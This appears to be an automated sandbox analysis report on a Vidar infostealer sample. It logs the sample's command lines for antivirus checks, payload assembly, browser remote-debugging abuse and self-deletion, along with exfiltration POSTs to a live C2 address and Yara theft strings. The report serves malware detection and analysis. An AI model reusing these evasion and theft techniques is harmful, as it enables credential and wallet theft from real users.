Windows Analysis Report
mNPTwHOuvT.exe

Overview

General Information

Sample name: mNPTwHOuvT.exe
(renamed because original name is a hash value)
Original sample name: 2db319e8bfd0b40bb3ac999cf4e6670c.exe
Analysis ID: 1589496
MD5: 2db319e8bfd0b40bb3ac999cf4e6670c
SHA1: c339ddf42d76c1a5ee35c3e6f14c6f818cc934f6
SHA256: 15a69592874503ccd6542cd58a70e20fac83e7e795505c11b9a379bb005090da
Tags: exe, user-abuse_ch
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mNPTwHOuvT.exe (PID: 1488 cmdline: "C:\Users\user\Desktop\mNPTwHOuvT.exe" MD5: 2DB319E8BFD0B40BB3AC999CF4E6670C)
    • cmd.exe (PID: 3140 cmdline: "C:\Windows\System32\cmd.exe" /c move Lou Lou.cmd & Lou.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3712 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6220 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5996 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3176 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2516 cmdline: cmd /c md 424372 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6180 cmdline: findstr /V "SYDNEY" Webmasters MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5532 cmdline: cmd /c copy /b ..\Hero + ..\Spell + ..\Pensions + ..\Wants + ..\Mars U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Fine.com (PID: 1440 cmdline: Fine.com U MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 6412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 5836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2136,i,8109458833846669920,3799157795582322690,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • msedge.exe (PID: 7692 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 7940 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2636,i,9989964858448437683,7276448006416970456,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • cmd.exe (PID: 7976 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\PP89HD2DTRQQ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 2472 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 4956 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 7924 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7340 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3672 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5256 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1136 --field-trial-handle=2104,i,17487451398241360211,6191727004034532126,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
{"C2 url": "http://www.microsoft.com0", "Botnet": "1402"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security

Source | Rule | Description | Author | Strings
0000000B.00000002.2939843523.00000000043B3000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Fine.com PID: 1440 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: Fine.com PID: 1440 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

Source | Rule | Description | Author | Strings
11.2.Fine.com.4310000.1.unpack | infostealer_win_vidar_strings_nov23 | Finds Vidar samples based on the specific strings | Sekoia.io
          • 0x2068c:$str01: MachineID:
          • 0x1f051:$str02: Work Dir: In memory
          • 0x206c3:$str03: [Hardware]
          • 0x20675:$str04: VideoCard:
          • 0x1fce5:$str05: [Processes]
          • 0x1fcf1:$str06: [Software]
          • 0x1f1bb:$str07: information.txt
          • 0x20398:$str08: %s\*
          • 0x203e5:$str08: %s\*
          • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
          • 0x1fb61:$str12: UseMasterPassword
          • 0x206cf:$str13: Soft: WinSCP
          • 0x2016e:$str14: <Pass encoding="base64">
          • 0x206b2:$str15: Soft: FileZilla
          • 0x1f1ad:$str16: passwords.txt
          • 0x1fb8c:$str17: build_id
          • 0x1fc80:$str18: file_data

          System Summary

          Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Fine.com U, ParentImage: C:\Users\user\AppData\Local\Temp\424372\Fine.com, ParentProcessId: 1440, ParentProcessName: Fine.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6412, ProcessName: chrome.exe

          HIPS / PFW / Operating System Protection Evasion

          Source: Process started, Author: Joe Security, Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Lou Lou.cmd & Lou.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3140, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3176, ProcessName: findstr.exe
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2025-01-12T17:22:43.902166+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49851 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:22:45.079946+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49860 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:22:46.576648+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49869 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:22:47.906794+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49880 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:22:49.276293+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49890 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:22:51.730323+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49902 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:22:51.742293+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49901 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:22:59.824701+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49969 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:00.910589+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49978 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:01.952740+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49988 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:03.498656+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49995 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:04.313417+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50004 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:10.654868+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50043 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:11.873153+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50051 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:12.885715+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50063 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:13.937567+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50074 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:16.216233+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50105 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:17.295384+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50113 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:19.402979+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50115 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:20.736794+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50117 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:22.063974+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50120 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:23.438444+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50124 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:27.518206+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50134 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:29.315486+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50137 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:23:30.674100+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 50142 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:22:48.602342+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 195.201.141.106 | 443 | 192.168.2.5 | 49880 | TCP
          2025-01-12T17:22:49.942460+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 195.201.141.106 | 443 | 192.168.2.5 | 49890 | TCP
          2025-01-12T17:22:49.941821+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.5 | 49890 | 195.201.141.106 | 443 | TCP
          2025-01-12T17:22:45.899918+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49860 | 195.201.141.106 | 443 | TCP

          AV Detection

          Source: 0000000B.00000002.2935633690.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Vidar {"C2 url": "http://www.microsoft.com0", "Botnet": "1402"}
          Source: mNPTwHOuvT.exe, Virustotal: Detection: 58%
          Source: mNPTwHOuvT.exe, ReversingLabs: Detection: 47%
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.9% probability
          Source: mNPTwHOuvT.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknown, HTTPS traffic detected: 195.201.141.106:443 -> 192.168.2.5:49851 version: TLS 1.2
          Source: mNPTwHOuvT.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe, Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
          Source: C:\Users\user\Desktop\mNPTwHOuvT.exe, Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com, Code function: 11_2_0023DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0023DC54
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com, Code function: 11_2_0024A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0024A087
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com, Code function: 11_2_0024A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0024A1E2
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com, Code function: 11_2_0023E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_0023E472
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com, Code function: 11_2_0024A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_0024A570
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com, Code function: 11_2_0020C622 FindFirstFileExW,11_2_0020C622
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com, Code function: 11_2_002466DC FindFirstFileW,FindNextFileW,FindClose,11_2_002466DC
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com, Code function: 11_2_00247333 FindFirstFileW,FindClose,11_2_00247333
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com, Code function: 11_2_002473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_002473D4
          Source: C:\Users\user\AppData\Local\Temp\424372\Fine.com, Code function: 11_2_0023D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0023D921
          Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
          Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\424372\
          Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
          Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
          Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\
          Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Temp\424372
          Source: chrome.exe, Memory has grown: Private usage: 5MB later: 39MB

          Networking

          Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49890 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49860 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 195.201.141.106:443 -> 192.168.2.5:49880
          Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 195.201.141.106:443 -> 192.168.2.5:49890
          Source: Malware configuration extractor, URLs: http://www.microsoft.com0
          Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, Host: 195.201.141.106, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----XBAIMGLN7QIM7YCTJWLN, Host: 195.201.141.106, Content-Length: 256, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----89R1NGVKNGVAAAAAAAAI, Host: 195.201.141.106, Content-Length: 331, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----BAI5X4O8YUSRQIW4WL68, Host: 195.201.141.106, Content-Length: 331, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----S0HVS2V3W4E3EUK6P89R, Host: 195.201.141.106, Content-Length: 332, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----VS0RQIWB1DJM7YUS0R9Z, Host: 195.201.141.106, Content-Length: 489, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----VS0RQIWB1DJM7YUS0R9Z, Host: 195.201.141.106, Content-Length: 7373, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----UAS0ZU3EUA1NYMY58GLX, Host: 195.201.141.106, Content-Length: 505, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----1VSRIWTJM7G47Q90HLN7, Host: 195.201.141.106, Content-Length: 213453, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----1VSRIWTJM7G47Q90HLN7, Host: 195.201.141.106, Content-Length: 55081, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----VSJECJEC2VAIM79HVAIW, Host: 195.201.141.106, Content-Length: 142457, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----JWT2DT2NGVAAAIEUSR1N, Host: 195.201.141.106, Content-Length: 493, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----IECBS26PZ58QIMOZU37Q, Host: 195.201.141.106, Content-Length: 3165, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----JE3OP8YU3EKF3EU3OZ5P, Host: 195.201.141.106, Content-Length: 207993, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----US0HLXBAAI5FU3WT000R, Host: 195.201.141.106, Content-Length: 68733, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----VKNG4E3OZMOZUAAASJ5P, Host: 195.201.141.106, Content-Length: 262605, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----A1VKFU3EKF3E37900ZM7, Host: 195.201.141.106, Content-Length: 393697, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----Q1VK6FCJW4E37Q9R9Z5X, Host: 195.201.141.106, Content-Length: 131557, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----YM7YMOHLXBIEUAIMOP89, Host: 195.201.141.106, Content-Length: 6990993, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----EUSR9ZUKXLNYMY589HL6, Host: 195.201.141.106, Content-Length: 331, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----BA1VAI58YMYU379R1D26, Host: 195.201.141.106, Content-Length: 331, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----4WTRQIMYUSJM7YMOHDTR, Host: 195.201.141.106, Content-Length: 453, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----IEUKNOH47GVAAAAIM7GL, Host: 195.201.141.106, Content-Length: 98165, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----FCB1VK689RQIEUAIMOPZ, Host: 195.201.141.106, Content-Length: 331, Connection: Keep-Alive, Cache-Control: no-cache
          Source: global traffic, HTTP traffic detected: POST / HTTP/1.1, Content-Type: multipart/form-data; boundary=----NYC2NO8Q1DJEU3O890R9, Host: 195.201.141.106, Content-Length: 331, Connection: Keep-Alive, Cache-Control: no-cache
          Source: Joe Sandbox View, IP Address: 18.244.18.27
          Source: Joe Sandbox View, IP Address: 18.238.49.99
          Source: Joe Sandbox View, IP Address: 162.159.61.3
          Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49860 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49851 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49880 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49902 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49890 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49901 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49869 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49969 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49978 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49988 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49995 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50004 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50043 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50051 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50063 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50074 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50105 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50113 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50115 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50117 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50120 -> 195.201.141.106:443
          Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:50124 -> 195.201.141.106:443
